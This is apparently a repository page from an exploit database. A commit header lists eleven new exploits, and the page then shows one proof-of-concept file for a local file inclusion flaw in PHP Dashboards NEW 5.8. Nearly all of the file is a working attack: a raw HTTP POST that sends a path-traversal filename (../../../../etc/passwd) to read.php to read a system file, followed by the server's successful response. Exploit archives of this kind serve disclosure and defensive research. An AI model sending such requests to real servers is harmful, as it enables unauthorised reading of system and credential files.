2ad3a5e94e
11 changes to exploits/shellcodes Linux Kernel 4.13 - 'compat_get_timex()' Leak Kernel Pointer Echo Mirage 3.1 - Buffer Overflow (PoC) GattLib 0.2 - Stack Buffer Overflow Kepler Wallpaper Script 1.1 - SQL Injection Coman 1.0 - 'id' SQL Injection Reservic 1.0 - 'id' SQL Injection MoneyFlux 1.0 - 'id' SQL Injection PHP Dashboards NEW 5.8 - 'dashID' SQL Injection PHP Dashboards NEW 5.8 - Local File Inclusion PHP Uber-style GeoTracking 1.1 - SQL Injection Adianti Framework 5.5.0 - SQL Injection
36 lines
No EOL
1.1 KiB
Text
36 lines
No EOL
1.1 KiB
Text
# Exploit Title: PHP Dashboards NEW 5.8 - Local File Inclusion
|
|
# Dork: N/A
|
|
# Date: 2019-01-21
|
|
# Exploit Author: Ihsan Sencan
|
|
# Vendor Homepage: http://dataninja.biz
|
|
# Software Link: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
|
|
# Version: 5.8
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: N/A
|
|
|
|
# POC:
|
|
# 1)
|
|
# http://localhost/[PATH]/php/file/read.php
|
|
#
|
|
|
|
POST /[PATH]/php/file/read.php HTTP/1.1
|
|
Host: TARGET
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 37
|
|
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
|
|
DNT: 1
|
|
Connection: keep-alive
|
|
Upgrade-Insecure-Requests: 1
|
|
filename=../../../../../../etc/passwd: undefined
|
|
HTTP/1.1 200 OK
|
|
Server: nginx
|
|
Date: Sun, 20 Jan 2019 20:56:25 GMT
|
|
Content-Type: text/html; charset=UTF-8
|
|
Transfer-Encoding: chunked
|
|
Connection: keep-alive
|
|
Host-Header: 192fc2e7e50945beb8231a492d6a8024 |